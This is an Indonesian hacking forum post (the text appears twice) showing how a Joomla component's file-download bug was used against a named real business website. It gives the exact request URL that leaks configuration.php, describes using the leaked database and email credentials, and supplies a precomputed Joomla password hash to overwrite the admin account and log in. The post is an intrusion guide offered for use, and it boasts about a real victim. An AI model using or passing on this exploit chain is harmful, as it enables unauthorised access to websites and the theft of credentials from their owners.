11-04-2015, 02:45 PM
Selamat Siang =))
kali ini kita sharing tentang bug di option jomla yaitu com_cckjseblod, sekilas ane bacanya ccktusbol wkwkw =))
ternyata salah
oke nemu target www[dot]athenameetings[dot]com
entah kenapa target di lingkup bisnis terus..
jadi gini, pada bug tersebut kita dapat melakukan download file configuration.php yang pada dasarnya merupakan file config joomla, nah di dalam file tersebut ada data FTP, MYSQL, SMPT dll, yang kerennya di web ini ane nemu smtp nya yang gogle, jadi masuk ke gmail, dan parahnya gmailnya butuh verifikasi lagi huhuhu
gambar : http://i.imgur.com/qVFIzZj.png
make bahasa aneh, ane ga ngerti walau ada translate juga wkwk
oke langsung aja untuk download file configurasinya seperti ini:
sitetarget.com/pathjoomlanya/index.php?option=com_cckjseblod&task=download&file=configuration.php
nah contoh dari taget ane gini :
www.athenameetings.com/index.php?option=com_cckjseblod&task=download&file=configuration.php
dan w00t!! dapet file configurationnya
oke lanjut lagi ngapain cuma sampe disitu, kentang (kenyang tanggung) namanya ahahah
kita lihat isi file configuration.php tersebut
gambar: http://i.imgur.com/DtpvQAz.png
nah dari email mah uda liat kan gimana haha ane bisa masuk tp butuh jawab pertanyaan lagi nih, sekarang kita masuk ke mysqlnya aja wakakak
gambar: http://i.imgur.com/4i5gEBP.png
dan w00tt bisa masuk euy wakakak sekarang ngapain?
check aja tables jos_users nya dulu kan itu table super admin joomla..
gambar: http://i.imgur.com/YHPe0Cq.png
hayoloo passwordnya wkwk
udeh gausa pusing, kita ganti aja passwordnya dengan password standart 123 di hash ke joomla, jadi gini:
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT
gambar: http://i.imgur.com/IK13ISz.png
nahh tinggal login dah:
user: admin
pass: 123
w00t!! g0t it!!
terus mau ngapain ? wakakak cari tau ndiri deh haha
kali ini kita sharing tentang bug di option jomla yaitu com_cckjseblod, sekilas ane bacanya ccktusbol wkwkw =))
ternyata salah
oke nemu target www[dot]athenameetings[dot]com
entah kenapa target di lingkup bisnis terus..
jadi gini, pada bug tersebut kita dapat melakukan download file configuration.php yang pada dasarnya merupakan file config joomla, nah di dalam file tersebut ada data FTP, MYSQL, SMPT dll, yang kerennya di web ini ane nemu smtp nya yang gogle, jadi masuk ke gmail, dan parahnya gmailnya butuh verifikasi lagi huhuhu
gambar : http://i.imgur.com/qVFIzZj.png
make bahasa aneh, ane ga ngerti walau ada translate juga wkwk
oke langsung aja untuk download file configurasinya seperti ini:
sitetarget.com/pathjoomlanya/index.php?option=com_cckjseblod&task=download&file=configuration.php
nah contoh dari taget ane gini :
www.athenameetings.com/index.php?option=com_cckjseblod&task=download&file=configuration.php
dan w00t!! dapet file configurationnya
oke lanjut lagi ngapain cuma sampe disitu, kentang (kenyang tanggung) namanya ahahah
kita lihat isi file configuration.php tersebut
gambar: http://i.imgur.com/DtpvQAz.png
nah dari email mah uda liat kan gimana haha ane bisa masuk tp butuh jawab pertanyaan lagi nih, sekarang kita masuk ke mysqlnya aja wakakak
gambar: http://i.imgur.com/4i5gEBP.png
dan w00tt bisa masuk euy wakakak sekarang ngapain?
check aja tables jos_users nya dulu kan itu table super admin joomla..
gambar: http://i.imgur.com/YHPe0Cq.png
hayoloo passwordnya wkwk
udeh gausa pusing, kita ganti aja passwordnya dengan password standart 123 di hash ke joomla, jadi gini:
531b5f50f082c59730b3bf7f9c457129:GA8lZqlJVZQbD8GYFGltJGNNIvjmcRcT
gambar: http://i.imgur.com/IK13ISz.png
nahh tinggal login dah:
user: admin
pass: 123
w00t!! g0t it!!
terus mau ngapain ? wakakak cari tau ndiri deh haha
Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do